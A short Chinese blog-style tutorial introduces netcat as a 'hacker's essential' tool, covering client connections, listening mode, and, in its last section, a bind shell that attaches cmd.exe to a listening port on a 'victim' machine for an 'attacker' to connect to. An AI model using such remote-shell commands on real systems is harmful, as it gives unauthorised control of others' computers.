黑客必备，瑞士军刀-nc 使用（一）

下了个nc，竟然不知道是命令行下运行，发现还是一点击输入指令就消失，还以为是杀软的事，边骂边把杀软关掉，没想到是命令行下。。囧，我太弱了。

=========================================================

1.当客户端使用

nc www.xxx.com 80

其中 www.xxx.com 是主机名，80是端口，例如某个服务器主机是127.0.0.1 ，它开放了端口80，然后我们用 nc 127.0.0.1 80 就能够连接这个服务器了，并且开始了通话如下：

当然也能连接别的服务器啦如：nc www.apache.org 80，只不过人家不让你访问罢了~~

2.服务器状态的nc

nc -l -p 80

其中-l（小写L）是指以服务器状态监听 ，-p 80是指定端口 80

例子就不举了，看看楼上的例子的就好了。

3.连接后运行程序

（先） 受害者机器：nc -l -p 80 cmd.exe 

（后） 攻击者机器：nc 127.0.0.1 80

然后攻击者就能得到受害者的权限了